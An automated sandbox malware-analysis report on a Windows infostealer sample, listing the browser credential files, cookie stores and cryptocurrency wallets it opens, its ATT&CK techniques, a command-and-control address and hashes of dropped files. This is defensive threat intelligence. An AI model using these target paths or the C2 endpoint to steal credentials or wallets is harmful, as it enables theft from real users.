                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001Jump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOGJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.oldJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: Yara matchFile source: Process Memory Space: Vd3tOP5WSD.exe PID: 2052, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.2.Vd3tOP5WSD.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Vd3tOP5WSD.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.Vd3tOP5WSD.exe.23c0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.Vd3tOP5WSD.exe.23c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2148951176.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Vd3tOP5WSD.exe PID: 2052, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                    Native API
                    1
                    LSASS Driver
                    1
                    Process Injection
                    32
                    Virtualization/Sandbox Evasion
                    1
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading
                    1
                    LSASS Driver
                    1
                    Process Injection
                    LSASS Memory471
                    Security Software Discovery
                    Remote Desktop Protocol31
                    Data from Local System
                    1
                    Non-Application Layer Protocol
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    1
                    Deobfuscate/Decode Files or Information
                    Security Account Manager32
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive11
                    Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Obfuscated Files or Information
                    NTDS2
                    Process Discovery
                    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Software Packing
                    LSA Secrets1
                    Account Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    System Owner/User Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync11
                    File and Directory Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem113
                    System Information Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Vd3tOP5WSD.exe89%ReversingLabsWin32.Trojan.Rhadamanthys
                    Vd3tOP5WSD.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://94.158.244.69/c2sockA0%Avira URL Cloudsafe
                    http://94.158.244.69:80/c2sockJ0%Avira URL Cloudsafe
                    http://94.158.244.69/c2sock-0%Avira URL Cloudsafe
                    http://94.158.244.69/c2sockx0%Avira URL Cloudsafe
                    http://94.158.244.69/l0%Avira URL Cloudsafe
                    http://94.158.244.69/c2socks30%Avira URL Cloudsafe
                    http://94.158.244.69/3-0%Avira URL Cloudsafe
                    http://94.158.244.69/c2sockD0%Avira URL Cloudsafe
                    http://94.158.244.69:80/c2sock70%Avira URL Cloudsafe
                    http://94.158.244.69/p0%Avira URL Cloudsafe
                    http://94.158.244.69:80/c2sock0%Avira URL Cloudsafe
                    http://94.150%Avira URL Cloudsafe
                    http://94.158.244.69/4-G0%Avira URL Cloudsafe
                    http://94.158.244.69:80/c2sockk0%Avira URL Cloudsafe
                    http://94.158.244.69/c2sockPV0%Avira URL Cloudsafe
                    http://94.158.244.69/sIWi0%Avira URL Cloudsafe
                    http://94.158.244.69//nhJ)0%Avira URL Cloudsafe
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://94.158.244.69/c2sockfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabVd3tOP5WSD.exe, 00000000.00000002.3920570857.00000000029F8000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://duckduckgo.com/ac/?q=Vd3tOP5WSD.exe, 00000000.00000002.3920570857.00000000029F8000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoVd3tOP5WSD.exe, 00000000.00000002.3920570857.00000000029F8000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://94.158.244.69/c2sock-Vd3tOP5WSD.exe, 00000000.00000002.3922174302.00000000032C0000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://94.158.244.69:80/c2sockJVd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000003033000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Vd3tOP5WSD.exe, 00000000.00000002.3920570857.00000000029F8000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://94.158.244.69/c2socks3Vd3tOP5WSD.exe, 00000000.00000002.3922174302.00000000032C0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://crl.rootca1.amazontrust.com/rootca1.crl0Vd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000002F84000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://94.158.244.69/c2sockDVd3tOP5WSD.exe, 00000000.00000002.3922174302.00000000032C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://upx.sf.netAmcache.hve.6.drfalse
                                  high
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Vd3tOP5WSD.exe, 00000000.00000002.3920570857.00000000029F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://94.158.244.69/3-Vd3tOP5WSD.exe, 00000000.00000002.3920570857.0000000002A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://ocsp.rootca1.amazontrust.com0:Vd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000002F84000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://94.158.244.69/c2sockAVd3tOP5WSD.exe, 00000000.00000002.3922174302.00000000032C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://94.158.244.69/pVd3tOP5WSD.exe, 00000000.00000002.3920570857.0000000002A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.ecosia.org/newtab/Vd3tOP5WSD.exe, 00000000.00000002.3920570857.00000000029F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://94.158.244.69/lVd3tOP5WSD.exe, 00000000.00000002.3920570857.0000000002A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brVd3tOP5WSD.exe, 00000000.00000002.3924235405.0000000003C61000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://94.158.244.69/c2sockxVd3tOP5WSD.exe, 00000000.00000002.3922174302.00000000032C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://ac.ecosia.org/autocomplete?q=Vd3tOP5WSD.exe, 00000000.00000002.3920570857.00000000029F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://94.158.244.69:80/c2sock7Vd3tOP5WSD.exe, 00000000.00000002.3923843389.0000000003540000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://94.158.244.69/sIWiVd3tOP5WSD.exe, 00000000.00000002.3920570857.0000000002A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://94.158.244.69/4-GVd3tOP5WSD.exe, 00000000.00000002.3920570857.0000000002A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://x1.c.lencr.org/0Vd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000002F84000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://x1.i.lencr.org/0Vd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000002F84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchVd3tOP5WSD.exe, 00000000.00000002.3920570857.00000000029F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://94.158.244.69:80/c2sockkVd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000003033000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?Vd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000002F84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://94.158.244.69:80/c2sockVd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000003033000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://94.158.244.69/Vd3tOP5WSD.exe, 00000000.00000002.3923843389.0000000003477000.00000004.00000020.00020000.00000000.sdmp, Vd3tOP5WSD.exe, 00000000.00000002.3920570857.0000000002A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://94.158.244.69/c2sockPVVd3tOP5WSD.exe, 00000000.00000002.3920570857.0000000002A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://support.mozilla.org/products/firefoxgro.allVd3tOP5WSD.exe, 00000000.00000002.3924235405.0000000003C61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://94.15Vd3tOP5WSD.exe, 00000000.00000002.3923843389.0000000003540000.00000004.00000020.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://94.158.244.69//nhJ)Vd3tOP5WSD.exe, 00000000.00000002.3920570857.0000000002A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Vd3tOP5WSD.exe, 00000000.00000002.3920570857.00000000029F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          94.158.244.69
                                                          unknownMoldova Republic of
                                                          39798MIVOCLOUDMDtrue
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1555042
                                                          Start date and time:2024-11-13 10:50:35 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 6m 57s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:7
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:Vd3tOP5WSD.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:6b5e8356c9c11bb8018e49bacb31892460073945fb601b61cebdcf838ac6c5f1.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@2/5@0/1
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 95%
                                                          • Number of executed functions: 59
                                                          • Number of non-executed functions: 90
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Override analysis time to 240s for sample files taking high CPU consumption
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 20.42.65.92
                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: Vd3tOP5WSD.exe
                                                          TimeTypeDescription
                                                          04:54:26API Interceptor1x Sleep call for process: WerFault.exe modified
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          94.158.244.694Oq9i3gm0g.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69/c2sock
                                                          RX7nieXlNm.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69/c2sock
                                                          5M5e9srxkE.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69/c2sock
                                                          dV01QsYySM.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69/c2sock
                                                          BeO2C8S5Ly.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69/c2sock
                                                          ToNaCrWjm7.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69/c2sock
                                                          IVN6n1kO22.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69/c2sock
                                                          Mc8s3us2xa.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69/c2sock
                                                          SMZP2H8p7i.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69/c2sock
                                                          qh0kepGznl.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69/c2sock
                                                          No context
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          MIVOCLOUDMDcgln32y2HF.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69
                                                          4Oq9i3gm0g.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69
                                                          RX7nieXlNm.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69
                                                          5M5e9srxkE.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69
                                                          dV01QsYySM.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69
                                                          BeO2C8S5Ly.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69
                                                          ToNaCrWjm7.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69
                                                          IVN6n1kO22.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69
                                                          Mc8s3us2xa.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69
                                                          SMZP2H8p7i.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69
                                                          No context
                                                          No context
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.8414810678425422
                                                          Encrypted:false
                                                          SSDEEP:192:6k+lgEob8I0u08mBJjGdzuiF+Z24IO8Lw:0lBob8ju08mBJjEzuiF+Y4IO8Lw
                                                          MD5:9DD88AF5785A6D6B2A334D4FC92D93D6
                                                          SHA1:F2320013F1292F9BAA93675A3037EBF98ECFEDB8
                                                          SHA-256:FCFBBB9150BB51D04483091AEC9427540E8834C71FF69EE7AC601F13C8622816
                                                          SHA-512:B9F9858171879A1EEC400733122DE17B773E2760BA8F81ACA4EC22B8241E5484D6857DE54D753680E19961E7B5BB3BB7629F1A31F6E684F789AF9BA6442B8514
                                                          Malicious:true
                                                          Reputation:low
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.9.6.5.2.6.3.1.4.9.0.8.6.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.9.6.5.2.6.3.6.3.3.4.3.7.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.8.8.2.8.1.2.-.5.8.3.1.-.4.4.8.1.-.a.e.2.0.-.b.3.f.0.0.2.e.4.b.1.0.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.d.b.8.d.8.5.-.9.6.f.1.-.4.e.6.d.-.9.7.e.3.-.e.f.4.0.d.6.3.3.0.1.8.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.V.d.3.t.O.P.5.W.S.D...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.0.4.-.0.0.0.1.-.0.0.1.5.-.c.0.2.2.-.8.8.9.c.b.1.3.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.8.d.1.e.9.a.f.d.d.f.0.0.2.2.5.2.8.9.c.2.8.8.4.6.e.4.6.3.f.d.2.0.0.0.0.1.1.4.1.!.0.0.0.0.8.4.4.8.a.6.b.5.3.a.5.b.e.3.8.e.e.7.2.1.0.6.5.1.6.1.d.2.0.8.2.4.3.6.8.3.7.9.f.2.!.V.d.3.t.O.P.5.W.S.D...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 15 streams, Wed Nov 13 09:54:23 2024, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):40140
                                                          Entropy (8bit):2.498175960495705
                                                          Encrypted:false
                                                          SSDEEP:192:QVZugX8sNRiwzGOSUrkPIFJ4vJwEvQQ0VkL1Xm/0RkX4mhw:A6sDicSUraIF6uEI1kLt20RkoOw
                                                          MD5:E0AA872E7FAFF49967851F3156F96340
                                                          SHA1:CA35BEAB62EEBF47A7A2C26739D4520644AF6AF9
                                                          SHA-256:553AE5F74E960DE63625AC0ADB66C57356E57C8568CF5CD91F62710E75DF2B73
                                                          SHA-512:5066A11E63A7A15060F55E4B417DDDCCF61C6703F9662268CE24F6BE2233DFEE17E50D64C56F7452A0A31265EA68744B3E8539AF9C18A87F1E51C09DE0792FCA
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:MDMP..a..... .......Ow4g............4...............H.......<...........T...."..........`.......8...........T...........P=..|_..........L...........8...............................................................................eJ..............GenuineIntel............T............v4gM............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8336
                                                          Entropy (8bit):3.6963968728483843
                                                          Encrypted:false
                                                          SSDEEP:192:R6l7wVeJzg6jt6Y2DUSU1gmfwhhpDu89blNsfYuA3m:R6lXJ06p6Y5SU1gmfwhzlGf79
                                                          MD5:DDE512E34EC44C7BA037EE9316DBAD1D
                                                          SHA1:EF1977F87BA0DC10499730133C8BAD6551BA5539
